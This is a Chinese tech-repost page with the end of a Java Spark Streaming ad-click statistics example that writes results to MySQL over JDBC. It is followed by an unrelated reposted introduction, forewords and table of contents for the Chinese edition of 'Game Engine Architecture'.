而我们通过J2EE技术进行趋势绘图的时候肯定是需要年、月、日、时、分这个维度的，所以我们在这里需要年月日、小时、分钟这些时间维度；/AdTrendStat adTrendStat = new AdTrendStat();adTrendStat.setAdID(adID);adTrendStat.setClickedCount(clickedCount);adTrendStat.set_date(time); //Todo:获取年月日adTrendStat.set_hour(time); //Todo:获取小时adTrendStat.set_minute(time);//Todo:获取分钟adTrend.add(adTrendStat);}final List<AdTrendStat> inserting = new ArrayList<AdTrendStat>();final List<AdTrendStat> updating = new ArrayList<AdTrendStat>();JDBCWrapper jdbcWrapper = JDBCWrapper.getJDBCInstance();//表的字段timestamp、ip、userID、adID、province、city、clickedCountfor(final AdTrendStat trend : adTrend) {final AdTrendCountHistory adTrendhistory = new AdTrendCountHistory();jdbcWrapper.doQuery("SELECT clickedCount FROM adclickedtrend WHERE"+ " date =? AND hour = ? AND minute = ? AND AdID = ?",new Object[]{trend.get_date(), trend.get_hour(), trend.get_minute(),trend.getAdID()}, new ExecuteCallBack() {public void resultCallBack(ResultSet result) throws Exception {// TODO Auto-generated method stubif(result.next()) {long count = result.getLong(1);adTrendhistory.setClickedCountHistoryLong(count);updating.add(trend);} else { inserting.add(trend);} }});}//表的字段date、hour、minute、adID、clickedCountList<Object[]> insertParametersList = new ArrayList<Object[]>();for(AdTrendStat insertRecord : inserting) {insertParametersList.add(new Object[] {insertRecord.get_date(),insertRecord.get_hour(),insertRecord.get_minute(),insertRecord.getAdID(),insertRecord.getClickedCount()});}jdbcWrapper.doBatch("INSERT INTO adclickedtrend VALUES(?, ?, ?, ?, ?)", insertParametersList);//表的字段date、hour、minute、adID、clickedCountList<Object[]> updateParametersList = new ArrayList<Object[]>();for(AdTrendStat updateRecord : updating) {updateParametersList.add(new Object[] {updateRecord.getClickedCount(),updateRecord.get_date(),updateRecord.get_hour(),updateRecord.get_minute(),updateRecord.getAdID()});}jdbcWrapper.doBatch("UPDATE adclickedtrend SET clickedCount = ? WHERE"+ " date =? AND hour = ? AND minute = ? AND AdID = ?", updateParametersList);} });return null;} });;/ Spark Streaming 执行引擎也就是Driver开始运行，Driver启动的时候是位于一条新的线程中的，当然其内部有消息循环体，用于接收应用程序本身或者Executor中的消息，/javassc.start();javassc.awaitTermination();javassc.close();}private static JavaStreamingContext createContext(String checkpointDirectory, SparkConf conf) {// If you do not see this printed, that means the StreamingContext has been loaded// from the new checkpointSystem.out.println("Creating new context");// Create the context with a 5 second batch sizeJavaStreamingContext ssc = new JavaStreamingContext(conf, Durations.seconds(10));ssc.checkpoint(checkpointDirectory);return ssc;} }class JDBCWrapper {private static JDBCWrapper jdbcInstance = null;private static LinkedBlockingQueue<Connection> dbConnectionPool = new LinkedBlockingQueue<Connection>();static {try {Class.forName("com.mysql.jdbc.Driver");} catch (ClassNotFoundException e) {// TODO Auto-generated catch blocke.printStackTrace();} }public static JDBCWrapper getJDBCInstance() {if(jdbcInstance == null) {synchronized (JDBCWrapper.class) {if(jdbcInstance == null) {jdbcInstance = new JDBCWrapper();} }}return jdbcInstance; }private JDBCWrapper() {for(int i = 0; i < 10; i++){try {Connection conn = DriverManager.getConnection("jdbc:mysql://Master:3306/sparkstreaming","root", "root");dbConnectionPool.put(conn);} catch (Exception e) {// TODO Auto-generated catch blocke.printStackTrace();} } }public synchronized Connection getConnection() {while(0 == dbConnectionPool.size()){try {Thread.sleep(20);} catch (InterruptedException e) {// TODO Auto-generated catch blocke.printStackTrace();} }return dbConnectionPool.poll();}public int[] doBatch(String sqlText, List<Object[]> paramsList){Connection conn = getConnection();PreparedStatement preparedStatement = null;int[] result = null;try {conn.setAutoCommit(false);preparedStatement = conn.prepareStatement(sqlText);for(Object[] parameters: paramsList) {for(int i = 0; i < parameters.length; i++){preparedStatement.setObject(i + 1, parameters[i]);} preparedStatement.addBatch();}result = preparedStatement.executeBatch();conn.commit();} catch (SQLException e) {// TODO Auto-generated catch blocke.printStackTrace();} finally {if(preparedStatement != null) {try {preparedStatement.close();} catch (SQLException e) {// TODO Auto-generated catch blocke.printStackTrace();} }if(conn != null) {try {dbConnectionPool.put(conn);} catch (InterruptedException e) {// TODO Auto-generated catch blocke.printStackTrace();} }}return result; }public void doQuery(String sqlText, Object[] paramsList, ExecuteCallBack callback){Connection conn = getConnection();PreparedStatement preparedStatement = null;ResultSet result = null;try {preparedStatement = conn.prepareStatement(sqlText);for(int i = 0; i < paramsList.length; i++){preparedStatement.setObject(i + 1, paramsList[i]);} result = preparedStatement.executeQuery();try {callback.resultCallBack(result);} catch (Exception e) {// TODO Auto-generated catch blocke.printStackTrace();} } catch (SQLException e) {// TODO Auto-generated catch blocke.printStackTrace();} finally {if(preparedStatement != null) {try {preparedStatement.close();} catch (SQLException e) {// TODO Auto-generated catch blocke.printStackTrace();} }if(conn != null) {try {dbConnectionPool.put(conn);} catch (InterruptedException e) {// TODO Auto-generated catch blocke.printStackTrace();} }} }}interface ExecuteCallBack {void resultCallBack(ResultSet result) throws Exception;}class UserAdClicked {private String timestamp;private String ip;private String userID;private String adID;private String province;private String city;private Long clickedCount;public String getTimestamp() {return timestamp;}public void setTimestamp(String timestamp) {this.timestamp = timestamp;}public String getIp() {return ip;}public void setIp(String ip) {this.ip = ip;}public String getUserID() {return userID;}public void setUserID(String userID) {this.userID = userID;}public String getAdID() {return adID;}public void setAdID(String adID) {this.adID = adID;}public String getProvince() {return province;}public void setProvince(String province) {this.province = province;}public String getCity() {return city;}public void setCity(String city) {this.city = city;}public Long getClickedCount() {return clickedCount;}public void setClickedCount(Long clickedCount) {this.clickedCount = clickedCount;} }class AdClicked {private String timestamp;private String adID;private String province;private String city;private Long clickedCount;public String getTimestamp() {return timestamp;}public void setTimestamp(String timestamp) {this.timestamp = timestamp;}public String getAdID() {return adID;}public void setAdID(String adID) {this.adID = adID;}public String getProvince() {return province;}public void setProvince(String province) {this.province = province;}public String getCity() {return city;}public void setCity(String city) {this.city = city;}public Long getClickedCount() {return clickedCount;}public void setClickedCount(Long clickedCount) {this.clickedCount = clickedCount;} }class AdProvinceTopN {private String timestamp;private String adID;private String province;private Long clickedCount;public String getTimestamp() {return timestamp;}public void setTimestamp(String timestamp) {this.timestamp = timestamp;}public String getAdID() {return adID;}public void setAdID(String adID) {this.adID = adID;}public String getProvince() {return province;}public void setProvince(String province) {this.province = province;}public Long getClickedCount() {return clickedCount;}public void setClickedCount(Long clickedCount) {this.clickedCount = clickedCount;} }class AdTrendStat {private String _date;private String _hour;private String _minute;private String adID;private Long clickedCount;public String get_date() {return _date;}public void set_date(String _date) {this._date = _date;}public String get_hour() {return _hour;}public void set_hour(String _hour) {this._hour = _hour;}public String get_minute() {return _minute;}public void set_minute(String _minute) {this._minute = _minute;}public String getAdID() {return adID;}public void setAdID(String adID) {this.adID = adID;}public Long getClickedCount() {return clickedCount;}public void setClickedCount(Long clickedCount) {this.clickedCount = clickedCount;} }class AdTrendCountHistory{private Long clickedCountHistoryLong;public Long getClickedCountHistoryLong() {return clickedCountHistoryLong;}public void setClickedCountHistoryLong(Long clickedCountHistoryLong) {this.clickedCountHistoryLong = clickedCountHistoryLong;} } 本篇文章为转载内容。原文链接：https://blog.csdn.net/tom_8899_li/article/details/71194434。该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

2023-02-14 19:16:35

297

转载

转载文章

[转载][置顶]《游戏引擎架构》信息总汇

...表本站的立场。作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。豆瓣当当亚马逊 China-pub 京东中国图书网淘宝 PDF样章试读微盘下载微云下载中英词汇索引表本页内容基本信息作者：Jason Gregory （杰森.格雷戈瑞）译者：Milo Yip（叶劲峰）原书名：Game Engine Architecture 出版社：电子工业出版社出版时间：2014-1-1 开本：16 页数：800 字数：1093400 ISBN：9787121222887 内容简介《游戏引擎架构》同时涵盖游戏引擎软件开发的理论及实践，并对多方面的题目进行探讨。本书讨论到的概念及技巧实际应用于现实中的游戏工作室，如艺电及顽皮狗。虽然书中采用的例子通常依据一些专门的技术，但是讨论范围远超于某个引擎或API。文中的参考及引用也非常有用，可让读者继续深入游戏开发过程的任何特定方向。《游戏引擎架构》为一个大学程度的游戏编程课程而编写，但也适合软件工程师、业余爱好者、自学游戏程序员，以及游戏产业的从业人员。通过阅读《游戏引擎架构》，资历较浅的游戏工程师可以巩固他们所学的游戏技术及引擎架构的知识，专注某一领域的资深程序员也能从本书更为全面的介绍中获益。內容包括：游戏开发中的大规模C++软件架构游戏编程所需的数学供调试、源代码控制及性能剖析的游戏开发工具引擎基础系统、渲染、碰撞、物理、角色动画、游戏世界对象模型等引擎子系统多平台游戏引擎多处理器环境下的游戏编程工作管道及游戏资产数据库作者／译者简介作者介绍：Jason Gregory在1994年开始任职专业软件工程师，自1999年3月开始在游戏产业中任职软件工程师。在圣迭哥Midway Home Entertainment公司开始游戏编程的他，为《疯狂飞行员（Freaky Flyers）》及《Crank the Weasel》开发PlayStation 2/Xbox上的动画系统。在2003年，他转到洛杉矶艺电，为《荣誉勋章：血战太平洋（Medal of Honor: Pacific Assault）》开发游戏引擎及游戏性技术，并在《荣誉勋章：空降神兵（Medal of Honor: Airborne）》中担任首席工程师。他现时是顽皮狗公司的通才程序员，为《神秘海域：德雷克船长的宝藏（Uncharted: Drake's Fortune）》及《神秘海域：纵横四海（Uncharted: Among Thieves）》开发引擎及游戏性软件。他也在南加州大学教授游戏技术的课程。译者简介：叶劲峰（Milo Yip）从小自习编程，并爱好计算机图形学。上中学时兼职开发策略RPG《王子传奇》，该游戏在1995年于台湾发行。其后他获取了香港大学认知科学学士、香港中文大学系统工程及工程管理哲学硕士。毕业后在香港理工大学设计学院从事游戏引擎及相关技术的研发，职至项目主任。除发表学术文章外，也曾合著《DirectX9游戏编程实务》。2008年往上海育碧担任引擎工程师开发《美食从天而降（Cloudy with a Chance of Meatballs）》Xbox360/PS3/Wii/PC，2009年起于麻辣马开发《爱丽丝：疯狂回归（Alice: Madness Returns）》Xbox360/PS3/PC，2011年加入腾讯互动娱乐引擎技术中心担任专家工程师，所研发的技术已用于《斗战神》、《天涯明月刀》、《众神争霸》等项目中。推荐序1 最初拿到《Game Engine Architecture》一书的英文版，是编辑侠少邮寄给我的打印版。他建议我接下翻译此书的合同。当时我正在杭州带领一个团队开发3D游戏引擎，我和我的同事都对这本书的内容颇有兴趣，两大本打印的英文书立刻在同事间传开。可惜那段时间个人精力顾及不来，把近千页的英文读物精读而后翻译成中文对个人的业余时间是个极大的挑战，不能担此翻译任务颇为遗憾。不久以后听说Milo Yip（叶劲峰）已开始着手翻译，甚为欣喜。翻译此巨著，他一定是比我更合适的人选。我和Milo虽未曾蒙面，但神交已久。在网络上读过一些他的成长经历，和我颇为相似，心有戚戚。他对游戏3D实时渲染技术研究精深为我所不及，我们曾通过Google Talk讨论过许多技术问题，他都有独到的见解。翻译工作开始后，Milo是香港人，英文技术术语在香港的中文译法和大陆的有许多不同。但此书由大陆出版社出版，考虑到面对的读者主要是大陆程序员，Milo希望能更符合大陆程序员的用词习惯，所以在翻译一开始就通过Google Docs创建了协作页面，邀请大家共同探讨书中技术名词的中译名。从中我们可以一窥他作为译者的慎重。三年之后，有幸在出版之前就拿到了完整的译本。这是一本用LaTeX精心排版的800页的电子书，我只花了一周时间，几乎是一口气读完。流畅的阅读享受，绝对不仅仅是因为原著精彩的内容，精美的版面和翔实的译注也加了不少分。在阅读本书的过程中，我不只一次地获得共鸣。例如在第5章的内存管理系统的介绍中，作者介绍的几种游戏特有的内存管理方法我都曾在项目中用过，而这是第一次有书籍专门将这些方法详尽记录；又如第11章动画系统的介绍，我们也同样在3D引擎开发过程中改进原有动画片段混合方法的经历。虽然书中介绍的每个技术点，都可能可以在某篇论文，某本其他的书的章节，某篇网络blog上见过，但之前却无一本书可以把这些东西放在一起相互参照。对于从事游戏引擎开发的程序员来说，了解各种引擎在处理每个具体问题时的方案是相当重要的。而每种方案又各有利弊，即使不做引擎开发工作而是在某一特定游戏引擎上做游戏开发，从中也可以理解引擎的局限性以及可能的改进方法。尤其是第14章介绍的对游戏性相关系统的设计，各个开发人员几乎都是凭经验设计，很少见有书籍对这些做总结。对于基于渲染引擎做开发的游戏程序员，这是必须面对的工作，这一章会有很大的借鉴意义。本书作者是业内资深的游戏引擎开发人，他所参于的《神秘海域》和《最后生还者》都是我的个人最爱。在玩游戏的过程中，作为游戏程序员的天性，自然会不断地猜想各个技术点是如何实现的，背后需要怎样的工具支持。能在书中一一得到印证是件特别开心的事情。作者反复强调代码实践的重要性，在书中遍布着C++代码。我不认为这些代码有直接取来使用的价值，但它们极大地帮助了读者理解书中的技术点。书中列出的顽皮狗工作室用lisp方言作为游戏配置脚本的范例也给我很大的启发，有了这些具体的代码示例以及作者本身的一线工程师背景，也让我确信书中那些关于主机游戏开发相关等，我所没有接触过的内容都也绝非泛泛而谈。国内的游戏开发社区的壮大，主要是随最近十年的MMO风潮而生。而就在大型网络游戏在中国有些畸形发展，让这类游戏偏离电子游戏游戏性的趋势时，我们有幸迎来了为移动设备开发游戏的大潮。游戏开发的重心重新回到游戏性本身。我们更需要去借鉴单机游戏是如何为玩家带来更纯粹的游戏体验，我相信书中记录的各种技术点会变的更有帮助。资深游戏开发及创业者云风 @简悦云风推荐序2 在我认识的许多游戏业开发同仁中，只有少数香港同胞，Milo Yip（叶劲峰）却正是这样一位给我印象非常深刻的优秀香港游戏开发者。我俩认识，是在Milo加入腾讯互动娱乐研发部引擎技术中心后，说来到现在也只是两年多时间。其间，他为人的谦逊务实，对待技术问题的严谨求真态度，对算法设计和性能优化的娴熟技术，都为人所称道。Milo一丝不苟的工作风格，甚至表现在对待技术文档排版这类事情上（Milo常执著地用LaTeX将技术文档排到完美），我想这一定是他在香港读大学、硕士及在香港理工大学的多媒体创新中心从事研究员，一贯沿袭至今的好作风。我很高兴腾讯游戏有实力吸引到这样优秀的技术专家；即使在其已从上海迁回香港家中，依然选择到深圳腾讯互动娱乐总部工作。叶兄从此工作日每天早晚过关，来往香港和深圳两地，虽有舟车劳顿，但是兼顾了对家庭的照顾和在游戏引擎方面的专业研究，希望这样的状况是令他满意的。认识叶兄当时，我便知道他在进行Jason Gregory所著《游戏引擎架构》一书的中译工作。因为自己从前也有业余翻译游戏开发有关书籍的经历，所以我能理解其中的辛苦和责任重大，对叶兄也更多一分钦佩。我以为，本书以及本书的中文读者最大的幸运便是，遇到叶兄这位对游戏有着如同对家对国般强烈责任感，犹如“游戏科学工作者”般的专业译者！现在（2013年年末）无疑是游戏史上对独立游戏制作者最友好的年代。开发设备方便获得（相对过往仅由主机厂商授权才能获得专利开发设备，现在有一台智能手机和一台个人电脑就可以开发）、技术工具友好、调试过程简单方便，且互联网上有丰富的例程和开源代码参考，也有网上社区便于交流。很多爱好者能够很快地制作出可运行的游戏原型，其中一些也能发布到应用商店。但是不全面掌握各方面知识，尤其是游戏引擎架构知识，往往只能停留在勉强修改、凑合重用别人提供的资源的应用程度上，难以做极限的性能改进，更妄谈革命式的架构创新。这样的程度是很难在成千上万的游戏中脱颖而出的。我们所认可的真正的游戏大作，必定是在某方面大幅超越用户期待的产品。为了打造这样的产品，游戏内容创作者（策划、美术等）需要“戴着镣铐跳舞”（在当前的机能下争取更多的创作自由度），而引擎架构合理的游戏可以经得起──也值得进行──反复优化，最终可以提供更多的自由度，这是大作出现的技术前提。书的作者、译者、出版社的编者，加上读者，大家是因书而结缘的有缘人。因叶兄这本《游戏引擎架构》译著而在线上线下相识的读者们，你们是不是因“了解游戏引擎架构，从而制作/优化好游戏”这样的理想而结了缘呢？亲爱的读者，愿你的游戏有一天因谜题巧妙绝伦、趣味超凡、虚拟世界气势磅礴、视觉效果逼真精美等专业因素取得业界褒奖，并得到玩家真诚的赞美。希望届时曾读叶兄这本《游戏引擎架构》译作的你，也可以回馈社会，回馈游戏开发的学习社区，帮助新人。希望你也可以建立微信公众号、博客等，或翻译游戏开发书籍，造福外语不好的读者，所以如果你的外语（英语、日语、韩语之于游戏行业比较重要）水平仍需精进，现在也可以同步加油了！腾讯《天天爱消除》游戏团队Leader 沙鹰 @也是沙鹰译序数千年以来，艺术家们通过文学、绘画、雕塑、建筑、音乐、舞蹈、戏剧等传统艺术形式充实人类的精神层面。自20世纪中叶，计算机的普及派生出另一种艺术形式──电子游戏。游戏结合了上述传统艺术以及近代科技派生的其他艺术（如摄影、电影、动画），并且完全脱离了艺术欣赏这种单向传递的方式──游戏必然是互动的，“玩家”并不是“读者”、“观众”或“听众”，而是进入游戏世界、感知并对世界做出反应的参与者。基于游戏的互动本质，游戏的制作通常比其他大众艺术复杂。商业游戏的制作通常需要各种人才的参与，而他们则需要依赖各种工具及科技。游戏引擎便是专门为游戏而设计的工具及科技集成。之所以称为引擎，如同交通工具中的引擎，提供了最核心的技术部分。因为复杂，研发成本高，人们不希望制作每款游戏（或车款）时都重新设计引擎，重用性是游戏引擎的一个重要设计目标。然而，各游戏本身的性质以及平台的差异，使研发完全通用的游戏引擎变得极困难，甚至不可能。市面上出售的游戏引擎，有一些虽然已经达到很高的技术水平，但在商业应用中，很多时候还是需要因应个别游戏项目对引擎改造、整合、扩展及优化。因此，即使能使用市面上最好的商用引擎或自研引擎，我们仍需要理解当中的架构、各种机制和技术，并且分析及解决在制作中遇到的问题。这些也是译者曾任于上海两家工作室时的主要工作范畴。选择翻译此著作，主要原因是在阅读中得到共鸣，并且能知悉一些知名游戏作品实际上所采用的方案。有感坊间大部分游戏开发书籍并不是由业内人士执笔，内容只足够应付一些最简单的游戏开发，欠缺宏观比较各种方案，技术与当今实际情况也有很大差距。而一些Gems类丛书虽然偶有好文章，但受形式所限欠缺系统性、全面性。难得本书原作者身为世界一流游戏工作室的资深游戏开发者（注1），在繁重的游戏开发工作外，还在大学教授游戏开发课程以至编写本著作。此外，从与内地同事的交流中，了解到许多从业者不愿意阅读外文书籍。为了普及知识及反馈业界社会，希望能尽绵力。或许有些人以为本著作是针对单机／游戏机游戏的，并不适合国内以网游为主的环境。但译者认为这是一种误解，许多游戏本身所涉及的技术是具通用性的。例如游戏性相关的游戏性系统、场景管理、人工智能、物理模拟等部分，许多时候也会同时用于网游的前台和后台。现时，一些动作为主、非MMO的国内端游甚至会直接在后台运行传统意义上的游戏引擎。至于前台相关的技术，单机和端游的区别更少。此外，随着近年移动终端的兴起，其硬件性能已超越传统掌上游戏机，开发手游所需的技术与传统掌上游戏机并无太大差异。还可预料，现时单机／游戏机的一些较高级的架构及技术，将在不远的未来着陆移动终端平台。译者认为，本书涵括游戏开发技术的方方面面，同时适合入门及经验丰富的游戏程序员。书名中的架构二字，并不单是给出一个系统结构图，而是描述每个子系统的需求、相关技术及与其他子系统的关系。对译者本人而言，本书的第11章（动画系统）及第14章（运行时游戏性基础系统）是本书特別精彩之处，含有许多少见于其他书籍的内容。而第10章（渲染引擎）由于是游戏引擎中的一个极大的部分，有限的篇幅可能未能覆盖广度及深度，推荐读者参考[1]（注2），人工智能方面也需参考其他专著。本译作采用LaTeX排版（注3），以Inkscape编译矢量图片。为了令阅读更流畅，内文中的网址都统一改以脚注标示。另外，由于现时游戏开发相关的文献以英文为主，而且游戏开发涉及的知识面很广，本译作尽量以括号形式保留英文术语。为了方便读者查找内容，在附录中增设中英文双向索引（索引条目与原著的不同）。本人在香港成长学习及工作，至2008年才赴内地游戏工作室工作，不黯内地的中文写作及用字习惯，翻译中曾遇到不少困难。有幸得到出版社人员以及良师益友的帮助，才能完成本译作。特别感谢周筠老师支持本作的提案，并耐心地给予协助及鼓励。编辑张春雨老师和卢鸫翔老师，以及好友余晟给予了大量翻译上的知识及指导。也感谢游戏业界专家云风、大宝和Dave给予了许多宝贵意见。此书的翻译及排版工作比预期更花时间，感谢妻子及儿女们的体谅。此次翻译工作历时三年半，因工作及家庭事宜导致严重延误，唯有在翻译及排版工作上更尽心尽力，希望求得等待此译作的读者们谅解。无论是批评或建议，诚希阁下通过电邮miloyip@gmail.com、新浪微博、豆瓣等渠道不吝赐教。叶劲峰（Milo Yip） 2013年10月原作者是顽皮狗（Naughty Dog）《神秘海域（Uncharted）》系列的通才程序员、《最后生还者（The Last of Us）》的首席程序员，之前还曾在EA和Midway工作。中括号表示引用附录中的参考文献。一些参考条目加入了其中译本的信息。具体是使用CTEX套装，它是在MiKTeX的基础上增加中文的支持。前言最早的电子游戏完全由硬件构成，但微处理器（microprocessor）的高速发展完全改变了游戏的面貌。现在的游戏是在多用途的PC和专门的电子游戏主机（video game console）上玩的，凭借软件带来绝妙的游戏体验。从最初的游戏诞生至今已有半个世纪，但很多人仍然认为游戏是一个未成熟的产业。即使游戏可能是个年轻的产业，若仔细观察，也会发现它正在高速发展。现时游戏已成为一个上百亿美元的产业，覆盖不同年龄、性别的广泛受众。千变万化的游戏，可以分为从纸牌游戏到大型多人在线游戏（massively multiplayer online game，MMOG）等多个种类（category）和“类型（genre）”（注1），也可以运行在任何装有微芯片（microchip）的设备上。你现在可以在PC、手机及多种特别为游戏而设计的手持/电视游戏主机上玩游戏。家用电视游戏通常代表最尖端的游戏科技，又由于它们是周期性地推出新版本，因此有游戏机“世代”（generation）的说法。最新一代（注2）的游戏机包括微软的Xbox 360和索尼的PlayStation 3，但一定不可忽视长盛不衰的PC，以及最近非常流行的任天堂Wii。最近，剧增的下载式休闲游戏，使这个多样化的商业游戏世界变得更复杂。虽然如此，大型游戏仍然是一门大生意。今天的游戏平台非常复杂，有难以置信的运算能力，这使软件的复杂度得以进一步提升。所有这些先进的软件都需要由人创造出来，这导致团队人数增加，开发成本上涨。随着产业变得成熟，开发团队要寻求更好、更高效的方式去制作产品，可复用软件（reusable software）和中间件（middleware）便应运而生，以补偿软件复杂度的提升。由于有这么多风格迥异的游戏及多种游戏平台，因此不可能存在单一理想的软件方案。然而，业界已经发展出一些模式，也有大量的潜在方案可供选择。现今的问题是如何找到一个合适的方案去迎合某个项目的需要。再进一步，开发团队必须考虑项目的方方面面，以及如何把各方面集成。对于一个崭新的游戏设计，鲜有可能找到一个完美搭配游戏设计各方面的软件包。现时业界内的老手，入行时都是“开荒牛”。我们这代人很少是计算机科学专业出身（Matt的专业是航空工程、Jason的专业是系统设计工程），但现时很多学院已设有游戏开发的课程和学位。时至今日，为了获取有用的游戏开发信息，学生和开发者必须找到好的途径。对于高端的图形技术，从研究到实践都有大量高质量的信息。可是，这些信息经常不能直接应用到游戏的生产环境，或者没有一个生产级质量的实现。对于图形以外的游戏开发技术，市面上有一些所谓的入门书籍，没提及参考文献就描述很多内容细节，像自己发明的一样。这种做法根本没有用处，甚至经常带有不准确的内容。另一方面，市场上有一些高端的专门领域书籍，例如物理、碰撞、人工智能等。可是，这类书或者啰嗦到让你难以忍受，或者高深到让部分读者无法理解，又或者内容过于零散而难于融会贯通。有一些甚至会直接和某项技术挂钩，软硬件一旦改动，其内容就会迅速过时。此外，互联网也是收集相关知识的绝佳工具。可是，除非你确实知道要找些什么，否则断链、不准确的资料、质量差的内容也会成为学习障碍。好在，我们有Jason Gregory，他是一位拥有在顽皮狗（Naughty Dog）工作经验的业界老手，而顽皮狗是全球高度瞩目的游戏工作室之一。Jason在南加州大学教授游戏编程课程时，找不到概括游戏架构的教科书。值得庆幸的是，他承担了这个任务，填补了这个空白。 Jason把应用到实际发行游戏的生产级别知识，以及整个游戏开发的大局编集于本书。他凭经验，不仅融汇了游戏开发的概念和技巧，还用实际的代码示例及实现例子去说明怎样贯通知识来制作游戏。本书的引用及参考文献可以让读者更深入探索游戏开发过程的各方面。虽然例子经常是基于某些技术的，但是概念和技巧是用来实际创作游戏的，它们可以超越个别引擎或API的束缚。本书是一本我们入行做游戏时想要的书。我们认为本书能让入门者增长知识，也能为有经验者开拓更大的视野。 Jeff Lander（注3） Matthew Whiting（注4）译注：Genre一词在文学中为体裁。电影和游戏里通常译作类型。不同的游戏类型可见1.2节。译注：按一般说法，2005年至今属于第7个游戏机世代。这3款游戏机的发行年份为Xbox 360（2005）、PlayStation 3（2006）、Wii（2006）。有关游戏机世代可参考维基百科。译注：Jeff Lander现时为Darwin 3D公司的首席技术总监、Game Tech公司创始人，曾为艺电首席程序员、Luxoflux公司游戏性及动画技术程序员。译注：Matthew Whiting现时为Wholesale Algorithms公司程序员，曾为Luxoflux公司首席软件工程师、Insomniac Games公司程序员。序言欢迎来到《游戏引擎架构》世界。本书旨在全面探讨典型商业游戏引擎的主要组件。游戏编程是一个庞大的主题，有许多内容需要讨论。不过相信你会发现，我们讨论的深度将足以使你充分理解本书所涵盖的工程理论及常用实践的方方面面。话虽如此，令人着迷的漫长游戏编程之旅其实才刚刚启程。与此相关的每项技术都包含丰富内容，本书将为你打下基础，并引领你进入更广阔的学习空间。本书焦点在于游戏引擎的技术及架构。我们会探讨商业游戏引擎中，各个子系统的相关理论，以及实现这些理论所需要的典型数据结构、算法和软件接口。游戏引擎与游戏的界限颇为模糊。我们将把注意力集中在引擎本身，包括多个低阶基础系统（low-level foundation system）、渲染引擎（rendering engine）、碰撞系统（collision system）、物理模拟（physics simulation）、人物动画（character animation），及一个我称为游戏性基础层（gameplay foundation layer）的深入讨论。此层包括游戏对象模型（game object model）、世界编辑器（world editor）、事件系统（event system）及脚本系统（scripting system）。我们也将会接触游戏性编程（gameplay programming）的多个方面，包括玩家机制（player mechanics）、摄像机（camera）及人工智能（artificial intelligence，AI）。然而，这类讨论会被限制在游戏性系统和引擎接口范围。本书可以作为大学中等级游戏程序设计中两到三门课程的教材。当然，本书也适合软件工程师、业余爱好者、自学的游戏程序员，以及游戏行业从业人员。通过阅读本书，资历较浅的游戏程序员可以巩固他们所学的游戏数学、引擎架构及游戏科技方面的知识。专注某一领域的资深程序员也能从本书更为全面的介绍中获益。为了更好地学习本书内容，你需要掌握基本的面向对象编程概念并至少拥有一些C++编程经验。尽管游戏行业已经开始尝试使用一些新的、令人兴奋的编程语言，然而工业级的3D游戏引擎仍然是用C或C++编写的，任何认真的游戏程序员都应该掌握C++。我们将在第3章重温一些面向对象编程的基本原则，毫无疑问，你还会从本书学到一些C++的小技巧，不过C++的基础最好还是通过阅读[39]、[31]及[32]来获得。如果你对C++已经有点生疏，建议你在阅读本书的同时，最好能重温这几本或者类似书籍。如果你完全没有C++经验，在看本书之前，可以考虑先阅读[39]的前几章，或者尝试学习一些C++的在线教程。学习编程技能最好的方法就是写代码。在阅读本书时，强烈建议你选择一些特别感兴趣的主题付诸实践。举例来说，如果你觉得人物动画很有趣，那么可以首先安装OGRE，并测试一下它的蒙皮动画示范。接着还可以尝试用OGRE实现本书谈及的一些动画混合技巧。下一步你可能会打算用游戏手柄控制人物在平面上行走。等你能玩转一些简单的东西了，就应该以此为基础，继续前进！之后可以转移到另一个游戏技术范畴，周而复始。这些项目是什么并不重要，重要的是你在实践游戏编程的艺术，而不是纸上谈兵。游戏科技是一个活生生、会呼吸的家伙，永远不可能将之束缚于书本之上。因此，附加的资源、勘误、更新、示例代码、项目构思等已经发到本书的网站。目录推荐序1 iii推荐序2 v译序 vii序言 xvii前言 xix致谢 xxi第一部分基础 1第1章导论 31.1 典型游戏团队的结构 41.2 游戏是什么 71.3 游戏引擎是什么 101.4 不同游戏类型中的引擎差异 111.5 游戏引擎概观 221.6 运行时引擎架构 271.7 工具及资产管道 46第2章专业工具 532.1 版本控制 532.2 微软Visual Studio 612.3 剖析工具 782.4 内存泄漏和损坏检测 792.5 其他工具 80第3章游戏软件工程基础 833.1 重温C++及最佳实践 833.2 C/C++的数据、代码及内存 903.3 捕捉及处理错误 118第4章游戏所需的三维数学 1254.1 在二维中解决三维问题 1254.2 点和矢量 1254.3 矩阵 1394.4 四元数 1564.5 比较各种旋转表达方式 1644.6 其他数学对象 1684.7 硬件加速的SIMD运算 1734.8 产生随机数 180第二部分低阶引擎系统 183第5章游戏支持系统 1855.1 子系统的启动和终止 1855.2 内存管理 1935.3 容器 2085.4 字符串 2255.5 引擎配置 234第6章资源及文件系统 2416.1 文件系统 2416.2 资源管理器 251第7章游戏循环及实时模拟 2777.1 渲染循环 2777.2 游戏循环 2787.3 游戏循环的架构风格 2807.4 抽象时间线 2837.5 测量及处理时间 2857.6 多处理器的游戏循环 2967.7 网络多人游戏循环 304第8章人体学接口设备（HID） 3098.1 各种人体学接口设备 3098.2 人体学接口设备的接口技术 3118.3 输入类型 3128.4 输出类型 3168.5 游戏引擎的人体学接口设备系统 3188.6 人体学接口设备使用实践 332第9章调试及开发工具 3339.1 日志及跟踪 3339.2 调试用的绘图功能 3379.3 游戏内置菜单 3449.4 游戏内置主控台 3479.5 调试用摄像机和游戏暂停 3489.6 作弊 3489.7 屏幕截图及录像 3499.8 游戏内置性能剖析 3499.9 游戏内置的内存统计和泄漏检测 356第三部分图形及动画 359第10章渲染引擎 36110.1 采用深度缓冲的三角形光栅化基础 36110.2 渲染管道 40410.3 高级光照及全局光照 42610.4 视觉效果和覆盖层 43810.5 延伸阅读 446第11章动画系统 44711.1 角色动画的类型 44711.2 骨骼 45211.3 姿势 45411.4 动画片段 45911.5 蒙皮及生成矩阵调色板 47111.6 动画混合 47611.7 后期处理 49311.8 压缩技术 49611.9 动画系统架构 50111.10 动画管道 50211.11 动作状态机 51511.12 动画控制器 535第12章碰撞及刚体动力学 53712.1 你想在游戏中加入物理吗 53712.2 碰撞/物理中间件 54212.3 碰撞检测系统 54412.4 刚体动力学 56912.5 整合物理引擎至游戏 60112.6 展望：高级物理功能 616第四部分游戏性 